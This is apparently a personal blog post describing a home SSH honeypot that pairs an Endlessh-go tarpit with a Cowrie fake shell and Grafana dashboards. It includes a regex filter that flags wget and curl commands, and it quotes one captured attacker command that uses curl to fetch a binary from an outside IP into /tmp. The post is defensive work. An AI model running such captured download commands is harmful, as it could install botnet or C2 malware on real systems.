Okay, before I want to start talking about my honeypot, I want to give huge shoutouts to the creators of Endlessh-go, Shizun Ge, and the team from Cowrie. Without them, this project would not have been made possible.
In this post, I want to talk about my simple honeypot design/the full setup overview, and some things I found during hosting of this honeypot. But first let me explain the name "L4berint". I chose this name, because when you try to connect, you lose any point of orientation. For the naming, I chose to take the word Labyrinth, and change the second a to a 4, exactly like "b4sh" :).
The Full Setup Overview
To break it up fast, the design is very simple, but with much thinking behind it. All of these ports are running on my device:
λ [~] nmap L4berint.honey Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-19 22:41 +0100 Nmap scan report for raspberrypi (L4berint.honey) Host is up (0.015s latency). PORT STATE 22/tcp open 2222/tcp open 22222/tcp open Nmap done: 1 IP address (1 host up) scanned in 0.41 seconds
The first port, 22, is running with Endlessh-go behind it. Endlessh-go is a nice Golang implementation of Endlessh, it's a fake SSH service that not only blocks the brute force noise that happens against your server, but also traps the attacker in his own jail. To make it short, when an attacker tries to connect, Endlessh exploits the SSH protocol by sending endless, slow banner lines before the actual handshake ever begins, so the attacker waits for an infinite time in the connection. The attacker has to manually close the connection by himself. Until then, the attacker is stuck in the connection.
Also, the developer of Endlessh-go was very smart and added the functionality to see all the traffic that comes in on a cool Grafana dashboard, which he also designed for us. A very nice tool to waste automatic scanners time and "noise" from annoying people.
Now, when you look from a perspective of someone who runs these bullshit SSH scanners and was stuck in port 22 for a while, you're pissed and want to attack my server even harder, so the next port 2222 is where you end up next.
Port 2222 — Cowrie
The next port 2222... is also a very interesting service, because behind there, there is also an SSH service. Let me introduce you to Cowrie. A great fake SSH service that pretends to be a fake Linux system, which accepts every possible SSH login data you try to connect with. But let me not explain much and just show you how it looks:
λ [~] ssh root@L4berint.honey -p 2222 ** WARNING: connection is not using a post-quantum key exchange algorithm. ** This session may be vulnerable to "store now, decrypt later" attacks. ** The server may need to be upgraded. See https://openssh.com/pq.html root@L4berint.honey's password: The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. root@HomeServer:~# ls root@HomeServer:~# whoami root root@HomeServer:~# ls /home phil root@HomeServer:~# ls /home/phil/ root@HomeServer:~# ping google.com PING google.com (29.89.32.244) 56(84) bytes of data. 64 bytes from google.com (29.89.32.244): icmp_seq=1 ttl=50 time=42.6 ms 64 bytes from google.com (29.89.32.244): icmp_seq=2 ttl=50 time=47.2 ms 64 bytes from google.com (29.89.32.244): icmp_seq=3 ttl=50 time=40.8 ms ^C --- google.com ping statistics --- 3 packets transmitted, 3 received, 0% packet loss, time 907ms rtt min/avg/max/mdev = 48.264/50.352/52.441/2.100 ms root@HomeServer:~# curl google.com <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"> <TITLE>301 Moved</TITLE></HEAD><BODY> <H1>301 Moved</H1> The document has moved <A HREF="http://www.google.com/">here</A>. </BODY></HTML> root@HomeServer:~#
Here are some interesting things happening. First, I didn't set up any of the folders in this directory, and also this isn't some kind of Docker container or something. This is just an amazing Python script that simulates this great fake SSH service. For everyone that tries to connect to that service, a log file is created. What a great service, you can watch the attackers while they try and think they are achieving some kind of shell on your server.
Also, I connected the log overview to its own Grafana dashboard with three informational windows: logins, commands, and dangerous commands. Logins shows every connection that happened, with the exact time they connected, the IP address, the username, and the password they used. The second one, commands, shows the IP address and the command that was executed on the server. The last window, dangerous commands, filters for wget, curl, http, and https with regex, and prints the exact time and date with the dedicated command and the IP address.
When we compare the login we simulated, we can see:
┌───────────────────────────────────────────────┐ ┌──────────────────────────────────┐ │ Logins: │ │ Commands: │ │ 19.02.26 22:04:02 | 192.168.0.193: root|toor │ │ 192.168.0.193: ls │ │ ... │ │ 192.168.0.193: whoami │ │ │ │ 192.168.0.193: ls /home │ │ │ │ 192.168.0.193: ls /home/phil/ │ │ │ │ 192.168.0.193: ping google.com │ │ │ │ 192.168.0.193: curl google.com │ └───────────────────────────────────────────────┘ └──────────────────────────────────┘ ┌─────────────────────────────────────────────────────────────────────────────────────┐ │ Dangerous Commands: │ │ 19.02.26 22:06:12 | 192.168.0.193 : curl google.com │ └─────────────────────────────────────────────────────────────────────────────────────┘
A very nice dashboard to see every person who has fallen into your trap and tried to "hack" into your device. And also for continuing analysis, you can see the important commands where someone tried to download their C2 client or some shady botnet software.
Port 22222 — The Real SSH
The last port would be the only remaining possibility for the hacker to unleash their hate against my server. On that last port, 22222, there is not much explanation to do, there is just the normal SSH service running. But if you would think that you could simply connect onto it, you fail, because after all this work to get through every port, so close to the finish line, my SSH service is configured so that it only accepts SSH connections with an SSH key, so no damage could be done there.
That is my final design of my honeypot.
Some interesting things I found out
Let me make this quick here. From the perspective, when you see all these information, you really understand when someone says the internet is a dangerous place. For example, even while I'm writing this text, someone has been probing Phil's home directory for the past half hour, to "hack" my device:
19.02.26 22:37:00 | 192.144.170.161 : nohup $SHELL -c "curl http://60.205.248.70:6352/linux -o /tmp/qJMU8...
That connection attempt, I'm seeing this same attempt frequently for about half a year now, which also supports my opinion, because why is it possible to basically try to "hack" some random server for half a year, with the same exact obvious tactic, and nothing is happening. This is 100% a bot, why isn't there any legal action against this threat...
So when there is missing safety of the great internet, here is where you have to step in, and maybe think about setting up your own "L4berint" honeypot. This is running perfectly on my Raspberry Pi with zero issues, come check it out yourself 77.22.84.202, and give me your opinions for the honeypot, maybe by logging into the fake SSH service and leaving some commands in Phil's home directory...
Thanks for reading my article, and good luck in the wild west of the internet.
- b4sh